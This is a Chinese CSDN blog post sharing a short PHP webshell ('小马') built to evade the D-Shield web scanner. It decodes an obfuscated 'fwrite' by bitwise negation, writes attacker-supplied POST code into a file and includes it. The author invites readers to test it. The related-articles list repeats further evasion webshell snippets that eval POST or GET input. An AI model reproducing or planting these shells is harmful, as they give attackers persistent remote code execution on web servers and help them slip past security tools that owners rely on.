一款过d盾PHP小马

最新推荐文章于 2022-08-29 23:58:13 发布
最新推荐文章于 2022-08-29 23:58:13 发布
阅读量330 收藏
点赞数
分类专栏: api 算法 文章标签: php 安全 其他 后端 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25017571/article/details/111187303
版权
该博客展示了PHP环境中的一种潜在安全风险,通过POST参数和md5函数创建并写入文件,然后执行含有用户输入的PHP代码。讨论了如何利用rand()函数和urldecode进行文件操作,并提醒读者注意防止代码注入攻击。
摘要由CSDN通过智能技术生成 
<?php
$_='%99%88%8D%96%8B%9A';
$pass='a';
$rand_=rand();
$a=$_POST[$pass];
$file=md5('shadowwolf');
$shell='<?php '.$a.' ?>';
$myfile = fopen($file, "w");
(~urldecode($_))($myfile, $shell);
include $file;

d盾测试·

可以自己测测看啊 qwq

shadow wolf
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
PHP小马免杀的浅谈[过最新D盾]
shadowwolf’s blog
07-25 742
PHP小马免杀的浅谈[过最新D盾] 绕过主要思路:使用写文件的函数写出另一个php文件然后include/require 回来执行方法1:File_put_content方法2 使用fwrite 绕过 主要思路:使用写文件的函数写出另一个php文件然后include/require 回来执行 方法1:File_put_content D盾还是报了,但如果是PHP7.0以上的,还是有绕过方法滴: <?php /* T00ls.net shadowwolf 2021-7-25 */ ( ~urldec
PHPD盾免杀小马.zip
06-14
提供混淆以及未混淆两个文件,可以随意过D盾,可用菜刀直接连接!
一个过D盾php小马
https://www.cnblogs.com/zpchcbd/
04-29 1669
这里给大家分享一个自己写的过D盾的马 <?php class ade { static $name = 'ceshi'; function __construct($name) { self::$name = $name; @eval(Null.self/**/::$name.Null); } } new ade($_POST[1]); 这里主要注意的一点的是$name...
D盾php webshell免杀马探讨
goddemon
07-19 1655
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任最近有在系统的总计waf绕过内容和后缀的绕过,把以前别的师傅发过的很多东西做了一些总结在这个过程中发觉了其实webshell的bypass手法还是蛮多的后缀bypass总结完了经过实战也绕过了很多家最新的waf后缀内容的还没写完东西有点多这里就分享一些php免杀的马全过的也有贼多但是暂时就不分享了。......
PHP小马
eT48_Sec
01-04 1899
http://xiaojianke.blog.163.com是我原来的博客,工作后换成了C博客,这里吐槽一下网易博客太差了。 看到网上那么多PHP小马,我也来自己写一个,练习PHP编程。 <?php error_reporting(E_ERROR); header('Content-Type:text/html; charset=utf-8'); $path=getcwd(); $pe
PHP小马免杀的浅谈[过最新D盾]1
08-03
这篇文章主要探讨的是如何在PHP环境中创建“小马”(webshell)并使其免于被安全软件如D盾检测。PHP小马通常是指一种恶意代码,允许攻击者远程控制被入侵的服务器,执行任意PHP命令。文章中提到了两种绕过D盾检测的...
分享一款小马客服系统源码
最新发布
03-10
可以实现一行代码接入客服,非常舒服,支持无限客服,无限坐席!私有化源码部署,数据可控,稳定可靠。可自定义版权、logo。支持网页、微信公众号、小程序、App等任何程序对接。 客服数量不限,每个客服又独立管理...
meeidol-luo#WebShell#另类PHP一句话小马1
07-25
另类PHP一句话小马利用了include可以把任何文件当php来解释的特性, 当我们上传一个文件的时候,会在服务器上生成一个临时文件,而$_FILES这个变量里
超小PHP小马小结(方便查找后门的朋友)
10-28
超小PHP小马小结,方便查找后门的朋友,发现相关类似代码可以直接封杀了
php绕过d盾,巧用匿名函数绕过D盾
weixin_34980267的博客
03-16 240
原标题:巧用匿名函数绕过D盾之前看了smile大佬的webshell绕过,跟着smile大佬的思路,自己来挖掘了一下绕过D盾的方式附上链接 https://www.anquanke.com/post/id/197631这篇文章中,smile大佬提到了非常多的绕过D盾方式,我就不重复了,我在这里主要是利用了匿名函数来绕过D盾在p神的博客中,找到了这么一个图片https://www.leavesong...
绕过D盾D盾实战绕过
11-18
绕过D盾实战,想学习的同学。。抓紧,这是一个带实战的视频。更有一个提升。
渗透测试-过D盾一句话+上传小马
lza20001103的博客
08-29 1359
D盾一句话+上传小马 文章目录过D盾一句话+上传小马前言方式一PHP一句话马方式二PHP上传小马 前言 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。 方式一 PHP一句话马 1.代码 <?php class
[php]写入类小马
qq_37301470的博客
11-18 266
<?php header("Content-type:text/html;charset=utf-8"); $get=$_GET['pwd']; $pass=md5(md5(123)); if(!empty($get)){ if(md5(md5($get))==$pass){ echo "login"."<br>"; echo '<form method="post">'; echo "服务器类型:".$_SERVER['SERVER_SOFT
绕过D盾一句话
Home to come
04-16 1062
通过网上各种渠道搜索,我一共上传了16个php文件,只有两个文件成功绕过了D盾 1. <?php eval('' . get() . ''); /** * @return string */ function get() { $get = $_GET['password']; return $get; } <?php $a=1;$b="a=".$_GE...
php超小免杀大马_超小PHP小马小结(方便查找后门的朋友)免杀
weixin_39579483的博客
12-30 851
作者: spider我也来个超小PHP小马复制代码 代码如下:header("content-Type: text/html; charset=gb2312");if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);?>保存文件名: if(isset($_POST['file...
PHP小马免杀
weixin_34072159的博客
11-12 770
PHP小马免杀 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=Content-Type content="text/html; c...
PHP木马
qq_41272376的博客
02-16 4617
PHP木马 一句话木马 可以在目标服务器上执行PHP代码,并和客户端(如菜刀,Cknife、冰蝎、蚁剑)进行交互的webshell,俗称小马。 多功能木马 根据PHP语法,编写较多代码,并在服务器上执行,完成所有功能的Webshell,俗称大马 逻辑木马 利用系统逻辑漏洞(如php uaf漏洞),绕过访问控制或执行特殊功能的WebShell PHP 可执行系统命令的函数 system string system ( string $command [, int &$return_var ] );
PHP小马免杀技巧:绕过D盾解析
"PHP小马免杀的浅谈[过最新D盾]1" 本文主要讨论的是如何在PHP环境中创建和执行免杀(即避免安全检测工具检测)的小马(恶意代码),特别是针对最新版本的D盾防御系统。作者分享了两种主要的绕过策略。 策略一:...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值